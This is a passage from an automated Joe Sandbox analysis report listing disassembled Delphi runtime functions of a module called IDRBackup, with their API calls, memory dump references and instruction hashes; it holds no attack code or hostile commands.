                                                                                                    • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                    • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$Sysutils@$File$Char$qqrr20FromStringpbStringx20$ExtractName$qqrx20Stringt1$Asg$qqrr20Cat$qqrr20Drive$qqrx20N$qqrvSameString$qqrr20Unique$AnsiClr$qqrpvCopy$qqrx20Delimiter$qqrx20LastLength$qqrr20Move$qqrpxvpviScan$qqrpbbStringiStringii
                                                                                                  • String ID:
                                                                                                  • API String ID: 178390892-0
                                                                                                  • Opcode ID: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                  • Instruction ID: 482c5ae77d457f58d2c42465c16c4b49129206617ce66a2e08880273dab9e065
                                                                                                  • Opcode Fuzzy Hash: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                  • Instruction Fuzzy Hash: 26414234A01A99ABDB01DBD4EC91ADEB3B5EF68200F504637F510A3241DB74DE868B91
                                                                                                  Function 50029604 Relevance: 27.2, APIs: 18, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029676
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 5002969F
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500298F5), ref: 500296B5
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 500296DB
                                                                                                  • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,500298F5), ref: 500296FA
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029764
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500298F5), ref: 50029777
                                                                                                  • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(00000000,500298F5), ref: 50029786
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 5002980F
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002981A
                                                                                                  • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(?,00000000,500298F5), ref: 50029864
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002988A
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 500298BA
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 500298C5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$InternalStringx20$Cat$qqrr20Sysutils@$Comp$qqrpxbt1uiCopy$qqrx20Stringii$Asg$qqrr20CharChar$qqrx20Length$qqrx20Stringi
                                                                                                  • String ID:
                                                                                                  • API String ID: 873705688-0
                                                                                                  • Opcode ID: 253641eb34a4d143ab3a2581e42b7379e36710be684173b05d6945abe8d2afe8
                                                                                                  • Instruction ID: be51fb8424686403522dc7b40415ecc70bc72e8b18d73c36ef70b9aef3598e1a
                                                                                                  • Opcode Fuzzy Hash: 253641eb34a4d143ab3a2581e42b7379e36710be684173b05d6945abe8d2afe8
                                                                                                  • Instruction Fuzzy Hash: 24A13934D1228A9FDF00DFA8E985AEEB7F1FF49300FA44266E404A7251D7749E81CB94
                                                                                                  Function 50029964 Relevance: 27.2, APIs: 18, Instructions: 178COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@ParamCount$qqrv.RTL120(00000000,50029B78), ref: 50029994
                                                                                                    • Part of subcall function 500046CC: GetCommandLineW.KERNEL32(00000000,5000471D,?,?,?,00000000), ref: 500046E3
                                                                                                  • @System@ParamStr$qqri.RTL120(00000000,50029B78), ref: 500299AD
                                                                                                    • Part of subcall function 5000472C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                    • Part of subcall function 5000472C: GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                    • Part of subcall function 5000472C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                  • @System@@SetEq$qqrv.RTL120(00000000,50029B78), ref: 500299BB
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 500299F5
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029A00
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A1D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A4E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029A6E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A7B
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A88
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 50029AB0
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029ABB
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029AD8
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029B09
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029B29
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B36
                                                                                                  • CompareStringW.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$From$AnsiChar$qqrx20InternalStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Stringx20$CompareCopy$qqrx20ParamStringii$CharCommandCount$qqrvEq$qqrvFileLen$qqrr20LineModuleNameStr$qqriStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 3651759711-0
                                                                                                  • Opcode ID: cd5cc04ada734ffdd08278c1e4b726aaa89d04c5e2e3be0d58094f2489661b81
                                                                                                  • Instruction ID: c09673ee74d34fb23c294186d7525fae2e6e01a2bf152108c741f07823023258
                                                                                                  • Opcode Fuzzy Hash: cd5cc04ada734ffdd08278c1e4b726aaa89d04c5e2e3be0d58094f2489661b81
                                                                                                  • Instruction Fuzzy Hash: 3A613970E0128A9FDF01DFA8E981AEEB7F9EF48300F904266E504E7251E7749D41CBA5
                                                                                                  Function 5001A8EC Relevance: 27.1, APIs: 18, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A921
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A92A
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A93F
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,5001AA7C), ref: 5001A955
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,?,00000000,5001AA7C), ref: 5001A967
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,5001AA7C), ref: 5001A976
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001AA7C), ref: 5001A998
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001AA7C), ref: 5001A9AC
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9B3
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9C7
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A9D4
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001A9F1
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001AA17
                                                                                                  • @Sysutils@StrEnd$qqrpxb.RTL120(00000000,5001AA7C), ref: 5001AA24
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001AA3E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Unicode$AnsiSysutils@$Scan$qqrpbbString$Char$qqrx20From$Char$qqrr20Move$qqrpxvpviStringb$End$qqrpxbInternalLength$qqrr20N$qqrvStr$qqrr20StringiStringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 3100482041-0
                                                                                                  • Opcode ID: ac5933cb5126ba6906b8115a9258b9b4bc1d021dfbd3a256c5a20e56419a4f34
                                                                                                  • Instruction ID: e71aa64f505d5f3bb0e37b2848e98b16ac34cbcc8d436ff160d5d4550b390a29
                                                                                                  • Opcode Fuzzy Hash: ac5933cb5126ba6906b8115a9258b9b4bc1d021dfbd3a256c5a20e56419a4f34
                                                                                                  • Instruction Fuzzy Hash: C941C021B012A69BDB019BE9DC912AEB3F5AF58200F944636E840D7352EB38DE418391
                                                                                                  Function 5002944C Relevance: 27.1, APIs: 18, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 5002948C
                                                                                                    • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                    • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 50029497
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294A3
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294AE
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294B8
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294C2
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,500295F1), ref: 500294D2
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294E3
                                                                                                    • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                    • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000000,500295F1), ref: 50029504
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029517
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029534
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029560
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029571
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$AnsiStringx20$Asg$qqrr20Char$qqrx20From$InternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@Upper$Case$qqrx20Cat$qqrr20CharCopy$qqrx20Stringii$BuffClr$qqrpvLen$qqrr20Length$qqrr20Move$qqrpxvpviN$qqrvPos$qqrx20StringiStringpbiStringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 2621940507-0
                                                                                                  • Opcode ID: ff1345ccb1cb74fbf93f5664dae3af5beed445668d21275d9704c0a32d1a5c61
                                                                                                  • Instruction ID: c8ac3393b34f38ec1835f6db0b975786c4e5aa466663b261a48470ebfa86302d
                                                                                                  • Opcode Fuzzy Hash: ff1345ccb1cb74fbf93f5664dae3af5beed445668d21275d9704c0a32d1a5c61
                                                                                                  • Instruction Fuzzy Hash: 24513930A0269A9FDF01DF98E8819DEB7B5FF49300F90866AE914A7255D734AE45CB80
                                                                                                  Function 5001D338 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D366
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D4A4), ref: 5001D394
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@FileExists$qqrx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D3A9
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D3C0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,5001D4A4), ref: 5001D3F2
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(?,00000000,5001D4A4), ref: 5001D410
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D421
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001D4A4), ref: 5001D43D
                                                                                                  • @Sysutils@AnsiLastChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D447
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,5001D4A4), ref: 5001D469
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D477
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D489
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$String$System@@$AnsiStringx20$FromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Asg$qqrr20Cat$qqrr20EnsureInternalString$qqrr20$CharChar$qqrx20Copy$qqrx20Exists$qqrx20FileIndex$qqrx20LastNextStringiStringii
                                                                                                  • String ID: \
                                                                                                  • API String ID: 1823336666-2967466578
                                                                                                  • Opcode ID: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                  • Instruction ID: 6d0a0c84b3d9e99a300f93f86f148e16fca29f9739a9876171c5e92ec0c1f276
                                                                                                  • Opcode Fuzzy Hash: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                  • Instruction Fuzzy Hash: 2C417134E00989DFDB10EFA8D99289EB3F1EF44300B5082A7E510E7221D770AF86D791
                                                                                                  Function 5002A794 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 106librarywindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002A8E2), ref: 5002A7B7
                                                                                                  • @System@LoadResourceModule$qqrpbo.RTL120(00000000,5002A8E2), ref: 5002A7C4
                                                                                                    • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,59800000,59857008), ref: 5000C5A8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5C8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5E6
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                    • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                  • GetModuleHandleW.KERNEL32(?,00000000,5002A8E2), ref: 5002A7D3
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00000000,5002A8E2), ref: 5002A7E6
                                                                                                  • GetLastError.KERNEL32(?,00000000,5002A8E2), ref: 5002A801
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(?,00000000,5002A8E2), ref: 5002A809
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A82B
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A830
                                                                                                  • FindResourceW.KERNEL32(00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A84E
